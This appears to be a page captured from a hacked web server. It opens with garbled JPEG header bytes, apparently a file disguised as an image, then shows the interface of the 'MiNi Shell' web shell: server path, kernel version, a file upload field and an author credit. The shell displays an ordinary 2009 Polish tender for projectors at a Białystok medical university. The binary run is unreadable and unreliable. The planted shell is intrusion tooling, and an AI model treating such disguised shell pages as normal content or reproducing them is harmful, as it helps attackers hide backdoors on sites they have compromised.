JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/129303-N-2009.html

<p class="kh_header"><b>Białystok: dostawę, zainstalowanie i uruchomienie sprzętu w postaci projektorów multimedialnych przeznaczonych dla poszczególnych jednostek organizacyjnych Uniwersytetu Medycznego w Białymstoku</b><br>
<b>Numer ogłoszenia: 129303 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Białymstoku , ul. Jana Kilińskiego 1, 15-089 Białystok, woj. podlaskie, tel. 085 7485400, faks 085 7485627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawę, zainstalowanie i uruchomienie sprzętu w postaci projektorów multimedialnych przeznaczonych dla poszczególnych jednostek organizacyjnych Uniwersytetu Medycznego w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawę, zainstalowanie i uruchomienie sprzętu w postaci projektorów multimedialnych przeznaczonych dla poszczególnych jednostek organizacyjnych Uniwersytetu Medycznego w Białymstoku.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.24.11.00-1.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki: 
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień,
   b)   posiadają niezbędną wiedzę oraz doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
    c) znajdują się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia przy założeniu, iż zapłata nastąpi w terminie 21 dni licząc od dnia otrzymania faktury VAT po zrealizowaniu kompleksowej dostawy przedmiotu zamówienia określonego w danej części,
     d) zaoferują sprzęt spełniający wymagania dotyczące przedmiotu zamówienia ,
e)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
art. 24 ustawy Pzp,
            f)   udzielą 24 miesięcznej gwarancji
 g) posiadają odpowiedni serwis gwarancyjny umożliwiający naprawę oferowanych urządzeń w terminie nie dłuższym niż 48 godzin, licząc od godziny zgłoszenia usterki (faksem), chyba że naprawa wymagać będzie sprowadzenia części z zagranicy,
h) pokryją wszelkie koszty związane z naprawami gwarancyjnymi (koszty dojazdu, koszty przesyłek kurierskich, etc.),
i)  w przypadku, gdy czas naprawy sprzętu przekroczy okres 48 godzin, licząc od godziny zgłoszenia usterki (faksem), przedłużą okres gwarancji o czas przerwy w jego eksploatacji oraz dostarczą urządzenia zastępcze o nie gorszych parametrach technicznych,
       j)   wymienią urządzenia na nowe jeżeli ilość napraw gwarancyjnych tego urządzenia 
      przekroczy liczbę 3,
      k)   w przypadku przyznania zamówienia publicznego, w ramach ceny ofertowej dostarczą,
zainstalują i uruchomią zamawiany sprzęt komputerowy w siedzibach końcowych użytkowników.
   2)    Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana 
  wg formuły: spełnia - nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, 
  że   w/w warunki Wykonawca spełnił.
  3)   Oferta musi być kompletna.
4)    Wykonawca zostanie wykluczony z postępowania, jeżeli chociaż jeden z w/w warunków 
       nie zostanie spełniony.
5)  Z postępowania o udzielenie zamówienia wykluczeniu podlegają również Wykonawcy, którzy: 
a)	złożą nieprawdziwe informacje mające wpływ na wynik prowadzonego  postępowania; 
b)	nie złożą oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 ustawy Pzp;
c)	nie zgodzili się na przedłużenie okresu związania ofertą.
6)	Ofertę Wykonawcy wykluczonego Zamawiający uzna za odrzuconą.
7)	O wykluczeniu z postępowania Zamawiający po wyborze oferty najkorzystniejszej  niezwłocznie powiadomi Wykonawcę podając uzasadnienie faktyczne i prawne.
8)	Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem oferty.
9)	Oferta musi być napisana w języku polskim, na maszynie do pisania, komputerze lub inną, czytelną i trwałą techniką, oraz podpisana przez osobę upoważnioną do reprezentowania firmy na zewnątrz i zaciągania zobowiązań w wysokości odpowiadającej cenie oferty. Każda zapisana strona oferty musi być ponumerowana kolejnymi numerami, a cała oferta zestawiona w sposób trwale połączony.
10)	 Nie dopuszcza się jakichkolwiek poprawek, skreśleń w treści oferty wraz z załącznikami, bez jednoczesnego podpisania się przez osoby uprawnione do reprezentacji Wykonawcy przy naniesionych poprawkach, skreśleniach, itp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) W celu potwierdzenia warunków udziału w postępowaniu Wykonawca jest zobowiązany załączyć do wniosku o dopuszczenie do udziału w licytacji: a) oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy, wypełnione i podpisane przez osoby upoważnione do reprezentowania wykonawcy (według wzoru stanowiącego załącznik nr 3A do ogłoszenia) albo przez Pełnomocnika reprezentującego wykonawców wspólnie ubiegających się o udzielenie zamówienia (według wzoru stanowiącego załącznik nr 3B do ogłoszenia). Jeśli wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, załącza do wniosku pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kserokopia poświadczona za zgodność z oryginałem przez osobę upoważnioną do reprezentowania wykonawcy) 2) Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu wykonawców mających siedzibę lub miejsce zamieszkania za granicą. 2.1) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wskazanych w sekcji X. pkt 1.) lit. b), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku o dopuszczenie do udziału w licytacji. 2.2) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji X. pkt 1.) lit. b), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 3) Dokumenty sporządzone w języku obcym są składane z tłumaczeniem na język polski, poświadczonym przez osoby upoważnione do reprezentowania wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> licytacje.uzp.gov.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> umwb.edu.pl</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1) Wykonawcy chcący wziąć udział w licytacji są zobowiązani do dokonania uprzedniej rejestracji na platformie do prowadzenia licytacji elektronicznych, zwanej dalej platformą, podczas której uzyskają LOGIN oraz do złożenia we wniosku o dopuszczenie do udziału w licytacji elektronicznej z podaniem uzyskanego LOGIN-u i wpłaceniem wadium. Wniosek o dopuszczenie do udziału w licytacji elektronicznej stanowi załącznik nr 2 do ogłoszenia i zamieszczony jest na stronie internetowej www.tarnow.pl oraz portal.tarnow.bip-gov.info.pl 2) Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się w systemie. 3) Przed rozpoczęciem korzystania z platformy zaleca się zapoznanie się z Samouczkiem, oraz z wersją demonstracyjną platformy, zamieszczonymi na stronie internetowej, na której będzie prowadzona licytacja elektroniczna. 4) Pomoc techniczną w zakresie funkcjonowania systemu (zgłaszanie ew. błędów) można uzyskać po numerem telefonu (022) 632 28 84. 5) Udział w licytacji elektronicznej wymaga dysponowania komputerem PC z systemem operacyjnym Windows/Linux oraz przeglądarką internetową Internet Explorer 6.0 lub wyższą lub Firefox 2.0 lub wyższą. 6) Zamawiający dopuści do udziału w licytacji elektronicznej i zaprosi do składania ofert wszystkich wykonawców, którzy spełnią warunki udziału w postępowaniu, określając w zaproszeniu termin związania ofertą wykonawcy (30 dni), który zaoferuje najniższą cenę..</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1) Po zalogowaniu się na platformie, Wykonawcy dopuszczeni do udziału w licytacji uzyskują dostęp do aplikacji umożliwiającej składanie ofert. W czasie trwania licytacji (od otwarcia licytacji do jej zamknięcia) Wykonawcy składają swoje oferty cenowe w postaci elektronicznej. 2) Zamawiający i wykonawcy od momentu otwarcia do momentu zamknięcia licytacji przekazują wnioski, oświadczenia i inne informacje drogą elektroniczną. 3) Oferty składane przez Wykonawców podlegają automatycznej klasyfikacji na podstawie ceny. System umożliwia składanie wyłącznie ofert o cenie niższej niż oferta wiodąca w danym momencie. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. 4) W trakcie licytacji elektronicznej system na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, oraz cenach złożonych przez Nich ofert, z tym że do momentu zamknięcia licytacji elektronicznej nie ujawnia się informacji umożliwiających identyfikację wykonawców. 5) Cena wywoławcza: 26.000.00 zł (brutto). 6) Minimalny krok postąpienia: 100.00 zł (brutto). System nie przyjmie postąpienia, którego wysokość jest mniejsza od określonego minimalnego postąpienia. Wysokość postąpienia jest liczona w odniesieniu do najkorzystniejszej oferty złożonej w danej licytacji. 7) System dopuszcza składanie postąpień z dokładnością do jednego grosza. Wartość groszy należy wpisywać po kropce..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">2 godziny</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 17.08.2009 godzina 09:00, miejsce: Sekcja d/s Zamówień Publicznych
ul. Mickiewicza 2 c, 15-022 Białystok.</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> 2009-08-24 11:00.</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> 2009-08-24 13:00.</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> 1) Zamawiający przewiduje licytację jednoetapową, a czas jej trwania wynosi 2 godziny. Zamknięcie licytacji nastąpi 2 godziny po otwarciu licytacji. 2) Przed przystąpieniem do złożenia postąpienia Wykonawca winien obliczyć cenę oferty tak, aby potem możliwe było dopasowanie cen jednostkowych do kwoty wylicytowanej oferty (brutto). 3) W cenie oferty należy uwzględnić podatek VAT. Cena oferty musi obejmować wszelkie koszty, jakie poniesie wykonawca z tytułu należytego oraz zgodnego z umową i obowiązującymi przepisami wykonania przedmiotu zamówienia. 4) Przy wyliczaniu wartości cen należy ograniczyć się do dwóch miejsc po przecinku na każdym etapie wyliczenia ceny, stosując ogólnie przyjęte zasady zaokrągleń. 5) Po zamknięciu licytacji elektronicznej Zamawiający na własnej stronie internetowej poda nazwę oraz adres Wykonawcy, którego ofertę wybrano..</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com